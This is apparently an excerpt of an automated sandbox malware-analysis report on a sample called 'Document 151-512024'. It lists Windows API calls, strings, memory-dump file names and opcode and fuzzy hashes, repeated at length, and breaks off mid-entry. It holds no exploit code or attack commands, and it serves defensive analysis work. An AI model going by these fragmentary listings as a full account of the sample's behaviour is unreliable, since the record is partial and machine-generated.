                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 3850602802-3368625520
                                                                                                    • Opcode ID: 1066712ba1951a3fb6db29bcabca22c98b64a6a34f7db02e15e288f24cfdd078
                                                                                                    • Instruction ID: d62f103e83b4bc51a377ad15e6c8cc033e1775f06fe3c405c21855ded842fb58
                                                                                                    • Opcode Fuzzy Hash: 1066712ba1951a3fb6db29bcabca22c98b64a6a34f7db02e15e288f24cfdd078
                                                                                                    • Instruction Fuzzy Hash: FD11C4711C4214BEEF108FA8CD15FB93BA9EB0A310F008116FB26DA2D1D6B4EA40DB50
                                                                                                    APIs
                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009BCD7D
                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009BCDA6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$OpenOption
                                                                                                    • String ID: <local>
                                                                                                    • API String ID: 942729171-4266983199
                                                                                                    • Opcode ID: 8a9722977aa643ab4db9a3a4017b2078fd213c1ad9c0a979e74aad67e2490a26
                                                                                                    • Instruction ID: 12c785c60d46ada76e4e80a2cf13154098214bdb09bbccce123fbedb447063c4
                                                                                                    • Opcode Fuzzy Hash: 8a9722977aa643ab4db9a3a4017b2078fd213c1ad9c0a979e74aad67e2490a26
                                                                                                    • Instruction Fuzzy Hash: 5F1102F9205636BAD7384B668C48EE7BEACEF927B4F40462AB149830C0D7749840D6F0
                                                                                                    APIs
                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 009D34AB
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009D34BA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                    • Opcode ID: 34d3e592a6967d13bad113a4c06cd84d35fd66bb8a67934510fa948a9a0a911b
                                                                                                    • Instruction ID: f8687a7d651aa59ee82946919b0356fa596ddb440fe62a454b3f5efe8993a9b7
                                                                                                    • Opcode Fuzzy Hash: 34d3e592a6967d13bad113a4c06cd84d35fd66bb8a67934510fa948a9a0a911b
                                                                                                    • Instruction Fuzzy Hash: 0411BF71180108AFEB118F64EC80AEB376EEB45379F50C726F960932E0C779DC919752
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,?,?,?), ref: 009D4FCC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 3850602802-3368625520
                                                                                                    • Opcode ID: 7c3eb54def22b65c7ebccbe12fa155a57f7214d8753fd5840261bbdd3e8c8a87
                                                                                                    • Instruction ID: 8359823c4226ec1f8d0c4429e604272bee8e2a1427fa8fc563ebfd5d11a3158b
                                                                                                    • Opcode Fuzzy Hash: 7c3eb54def22b65c7ebccbe12fa155a57f7214d8753fd5840261bbdd3e8c8a87
                                                                                                    • Instruction Fuzzy Hash: 7521D37661011AEFCB15CFA8C940CEA7BB9FB4D340B018555FA05A7320D631E961EB90
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 009A6CB6
                                                                                                    • _wcslen.LIBCMT ref: 009A6CC2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                    • String ID: STOP
                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                    • Opcode ID: 450299d9f71ad603ff4444494171a4f65c6425bc7fcfa469876eed9fcd94af3a
                                                                                                    • Instruction ID: f675a8550191548c6c5843435cb609c749e1143043fbc170c5069b197c5cbc8e
                                                                                                    • Opcode Fuzzy Hash: 450299d9f71ad603ff4444494171a4f65c6425bc7fcfa469876eed9fcd94af3a
                                                                                                    • Instruction Fuzzy Hash: FC012632A005278BCB209FFDDC809BF33B8EFA27647050924E9A2971D5EB35D900C690
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 0-3368625520
                                                                                                    • Opcode ID: 35e1a09832b3670471c34d59df1365bfecd4aefb9b5c3c12c0b399cf39d52861
                                                                                                    • Instruction ID: f7fcf88c999b5c0c9b648f2d2b387639ae8bdf8ee8e062bcb75150558bb8695d
                                                                                                    • Opcode Fuzzy Hash: 35e1a09832b3670471c34d59df1365bfecd4aefb9b5c3c12c0b399cf39d52861
                                                                                                    • Instruction Fuzzy Hash: 48115B34604604AFCB20CF69C840EA5B7AAFF99320F148619FA258B2A0CB71E941CF80
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                      • Part of subcall function 009A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009A3CCA
                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009A1D4C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: 1a4955e8cc79df81768509ff243351f4456508278fa8cbae23d71ca5441e69ca
                                                                                                    • Instruction ID: a0b6589b75cf36c5d3021749db28811fc6a6630f693eb76c8b2ddf318cb26a5b
                                                                                                    • Opcode Fuzzy Hash: 1a4955e8cc79df81768509ff243351f4456508278fa8cbae23d71ca5441e69ca
                                                                                                    • Instruction Fuzzy Hash: 7501D875A51218ABCB08EBA4DC55DFF77A8FB87350F044A19F876573C1EA30590886A0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                      • Part of subcall function 009A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009A3CCA
                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 009A1C46
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: a08b5e047e30584a371d714e9ec45683380c4b169b4e39dd1891caad4b4089eb
                                                                                                    • Instruction ID: f54dabaefab7038ee24442432a466dd50f9f23c5424b0b35e1ea3ab2c1575a96
                                                                                                    • Opcode Fuzzy Hash: a08b5e047e30584a371d714e9ec45683380c4b169b4e39dd1891caad4b4089eb
                                                                                                    • Instruction Fuzzy Hash: 1F01A775AC110866CB04EBA0DD52EFF77BC9B53350F140419B886672C2EA249E08D6F1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                      • Part of subcall function 009A3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009A3CCA
                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 009A1CC8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 624084870-1403004172
                                                                                                    • Opcode ID: 1daec588812e336db6355cd93afa466143c439b43ab3e142ba3ec5f0d0bb084d
                                                                                                    • Instruction ID: d189259b7f8d6337eaabf8536ed323af186d832ec2f66403b4a341989ac60e40
                                                                                                    • Opcode Fuzzy Hash: 1daec588812e336db6355cd93afa466143c439b43ab3e142ba3ec5f0d0bb084d
                                                                                                    • Instruction Fuzzy Hash: 6701ADB5A8111866CB04EBA4DA42FFF77BCAB53350F140415B88673282EA209F08C6F1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                    • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0099769C,?,?,?), ref: 009D9111
                                                                                                      • Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952
                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 009D90F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$MessageProcSend
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 982171247-3368625520
                                                                                                    • Opcode ID: 5ca5ece071df9b9a58d4afffbf78ad6f85c621ead3c80498e0a94d8b9de4bc10
                                                                                                    • Instruction ID: 78877da1965bebe08e22a5ab40495e8c57d7340ba53392c986f08675156143e9
                                                                                                    • Opcode Fuzzy Hash: 5ca5ece071df9b9a58d4afffbf78ad6f85c621ead3c80498e0a94d8b9de4bc10
                                                                                                    • Instruction Fuzzy Hash: 50012430248204ABEB20AF14DC49FA63BB6FF85325F00811AF9151B3E0C7326C41DB10
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: 3, 3, 16, 1
                                                                                                    • API String ID: 176396367-3042988571
                                                                                                    • Opcode ID: 21937b116de4e131923e0de614d4dcf9891c181e999de469eac50e85b158129c
                                                                                                    • Instruction ID: a4cb4bc2c92af8e134b42bebde8f5b0ecffb3c2257f4b1168775979142134e4c
                                                                                                    • Opcode Fuzzy Hash: 21937b116de4e131923e0de614d4dcf9891c181e999de469eac50e85b158129c
                                                                                                    • Instruction Fuzzy Hash: 14E02B02A4462020A23512FAADC1F7F968FDFC5B90710182FF981C62B6EA948D9193A2
                                                                                                    APIs
                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009A0B23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                    • Opcode ID: ad0625d797c895523382d466b4546dda226c99b4ca1e4efd45b6afeb249235a8
                                                                                                    • Instruction ID: 1bd5bbe4e247dd1d04e9ce9ea2f1689c28eab4ec746e5f04ac8f442fb057fba0
                                                                                                    • Opcode Fuzzy Hash: ad0625d797c895523382d466b4546dda226c99b4ca1e4efd45b6afeb249235a8
                                                                                                    • Instruction Fuzzy Hash: 45E0D87128430936D2143795BC03F897B848F45B61F104427FB88555C38AD2249096E9
                                                                                                    APIs
                                                                                                      • Part of subcall function 0095F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00960D71,?,?,?,0094100A), ref: 0095F7CE
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0094100A), ref: 00960D75
                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0094100A), ref: 00960D84
                                                                                                    Strings
                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00960D7F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                    • API String ID: 55579361-631824599
                                                                                                    • Opcode ID: 98ad14e4583b7736b0214c6694077502d213e9e0bcb7bea322335500afb41dd0
                                                                                                    • Instruction ID: 35d247b4fba9e93244291000c34a3ce8ffbcf83b8db364420f520c901c112a18
                                                                                                    • Opcode Fuzzy Hash: 98ad14e4583b7736b0214c6694077502d213e9e0bcb7bea322335500afb41dd0
                                                                                                    • Instruction Fuzzy Hash: 5BE092B02403018BD370DFB8E4557477BE4AF54745F008A2EE592C7795DBB0E488CBA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID: %.3d$X64
                                                                                                    • API String ID: 481472006-1077770165
                                                                                                    • Opcode ID: e192cf88724b2f79171b28bae818a24920efe85e79d0fc3d93a1fe2e63d5099d
                                                                                                    • Instruction ID: d2168c4a6e83b3ab2a3fdd0b8ed06781bf046d193a48e141a53dcc2c9baf07e5
                                                                                                    • Opcode Fuzzy Hash: e192cf88724b2f79171b28bae818a24920efe85e79d0fc3d93a1fe2e63d5099d
                                                                                                    • Instruction Fuzzy Hash: 6BD012A1C0A109EACF50D7E4DC859BDB37CBB18302F508C52FD26A1080D63CD548A761
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009D232C
                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009D233F
                                                                                                      • Part of subcall function 009AE97B: Sleep.KERNEL32 ref: 009AE9F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 529655941-2988720461
                                                                                                    • Opcode ID: d5875b46105eb2e9ef20326dccdcc67ae890f06a490737f7443706cf3eebd75b
                                                                                                    • Instruction ID: 40b87621f9dba455601874e599079d58707b8b8ab5425e384abee8fa5f9173e7
                                                                                                    • Opcode Fuzzy Hash: d5875b46105eb2e9ef20326dccdcc67ae890f06a490737f7443706cf3eebd75b
                                                                                                    • Instruction Fuzzy Hash: A7D0C9763E9311B6EA64A770AC0FFC67A58AB40B14F0049167645AA1D0C9A0A841DA54
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009D236C
                                                                                                    • PostMessageW.USER32(00000000), ref: 009D2373
                                                                                                      • Part of subcall function 009AE97B: Sleep.KERNEL32 ref: 009AE9F3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                    • String ID: Shell_TrayWnd
                                                                                                    • API String ID: 529655941-2988720461
                                                                                                    • Opcode ID: ab249cbf6d38dd6cea38df731929c9df0697165c11c44fc26b041f3935118e96
                                                                                                    • Instruction ID: 8e71b255eb027708797010872c431d50f509a7661628b8667a76ac8bfa48116f
                                                                                                    • Opcode Fuzzy Hash: ab249cbf6d38dd6cea38df731929c9df0697165c11c44fc26b041f3935118e96
                                                                                                    • Instruction Fuzzy Hash: 30D0C9723DA3117AEA64A770AC0FFC67658AB45B14F4049167645AA1D0C9A0A841DA58
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0097BE93
                                                                                                    • GetLastError.KERNEL32 ref: 0097BEA1
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0097BEFC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0
                                                                                                    • Opcode ID: e5bbde7951155bdc195a9bc1979ef32cb62d0febf8df689639c2f604d3b655ea
                                                                                                    • Instruction ID: 8ede2e6271163925de59021ba8091ed702944dd4615cdf2fe0e190c3c2fa879d
